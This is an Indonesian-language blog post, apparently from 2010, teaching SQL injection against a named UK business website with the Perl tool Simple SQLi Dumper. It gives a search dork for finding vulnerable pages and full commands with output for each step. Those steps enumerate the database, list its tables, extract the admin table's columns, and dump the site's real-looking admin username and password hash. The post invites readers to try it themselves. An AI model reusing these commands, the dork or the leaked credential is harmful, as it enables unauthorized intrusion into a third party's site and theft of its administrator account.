Tutorial sql injection dengan Simple SQLi Dumper v5.1 .......
persiapan alat perang :
1.rokok
2.cemilan
3.bir
4.cwek untuk nambah semangat nginject :D
Langkah-Langkah Yang Mesti Benar2 Di Perhatikan
1.perl kalau di linux udh ada :D ..nah gmn kalau di windows download di sini "http://www.perl.org/get.html"
2.sqli dumper v.51 ... download di sini "http://www.ziddu.com/download/10540105/ssdp51.tar.gz.html "
trus extrack yang windows extrack di drive C kl linux taruh di folder my documentnya linux .... Pfft
ok udh siapkan sekarang mulai .......
target : http://www.beautycall.co.uk/gallery.php?id=1
dork :inurl:/gallery.php?id=
nah buka jendela terminal for linux ..dan .cmd for windows
step 1 "Find Magic Number / Null Column "-magic"
Command: perl ssdp.pl -u [URL] -magic
example"ketikkan perintah ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic
dan ini hasilnya .....
--------------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1 -magic
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:22:10 2010
Help Command: -h, -help, --help
[+] URL: http://www.beautycall.co.uk/gallery.php?id=1
[+] End Tag: --
Attempting to find the magic number...
[+] Testing: 1,2,3,
[+] Field Length : 3
[+] Magic Number : 2,3,
[+] URL Injection: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
Showing MySQL Information ...
[+] Database: beautycall_co_uk_web
[+] User: pmowat@localhost
[+] Version: 5.0.67
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": No
Done.
---------------------------------------------------------------------------------------
step 2
find the table
Concat Tables
Command: perl ssdp.pl -u [SQLi URL] -table
contoh ketikkan perintah ini :
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table
ini hasilnya :
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -table
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:24:59 2010
Help Command: -h, -help, --help
[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 40
Showing tables ...
[1] CITY(6)
[2] COUNTRY(32)
[3] admin(1)
[4] aplicationform(31)
[5] appointment(898)
[6] appointment_event(8)
[7] artist(96)
[8] artist_text_image(1)
[9] city(6)
[10] contact(1)
[11] efranchisee(122)
[12] files(2)
[13] files2(33)
[14] files3(0)
[15] folders(2)
[16] form(158)
[17] franchise(9)
[18] franchiseefolders(8)
[19] galery(20)
[20] homepage(1)
[21] links(26)
[22] links_cat(12)
[23] log(0)
[24] midlands(10)
[25] north(6)
[26] package_image(1)
[27] packages(5)
[28] postcode(122)
[29] regions(8)
[30] register(4)
[31] services(6)
[32] shortform(36)
[33] southeast(14)
[34] southwest(6)
[35] states(11)
[36] subfolders(14)
[37] ukmap(125)
[38] ukpostcodes(104)
[39] vouchers(1)
[40] wales(2)
Done.
--------------------------------------------------------------------------------
nah udh di dapatkan tablenya :D
nah lihat tuh table admin :D
sekarang kita ingin isi colomn admin tersebut .......
step 3
mencari colomn admin
Concat Columns
Required Options: -u, -t
Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column
contoh ketikan command ini
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column
hasilna seperti ini
---------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -column
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:38:30 2010
Help Command: -h, -help, --help
[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Number of Columns: 4
Showing columns from table "admin" ...
[+] admin(1): id,username,password,email
Done.
------------------------------------------------------------------------------------
nah itu ada isi colom admin id, username,password dan email ....wah keren yah ini tools Pfft
nah sekarang apa lagi ..
step end
dumping data
now we'll see information inside that column.. Smile
command # perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump
contoh ketikkan perintah ini "
perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump
hasilna
-------------------------------------------------------------------------------------
jimmyromanticdevil@jimmyromanticdevil-laptop:~$ perl ssdp.pl -u http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3 -t admin -c username,password -dump
[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sat Jul 3 14:43:37 2010
Help Command: -h, -help, --help
[+] c0li SQLi URL: http://www.beautycall.co.uk/gallery.php?id=1+AND+1=2+UNION+ALL+SELECT+1,c0li,3
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: admin
[+] Column Name: username,password
[+] Data Count: 1
Dumping Data ...
[1] beautycall2010 : d68553e40237bde1465a1da5b199c072
Done.
-----------------------------------------------------------------------------
akhirnya di dapatkan username dan password admin ...
username : beautycall2010
pass: d68553e40237bde1465a1da5b199c072
seee it simple ..and easy ....silahkan di coba ....
Tidak ada komentar:
Posting Komentar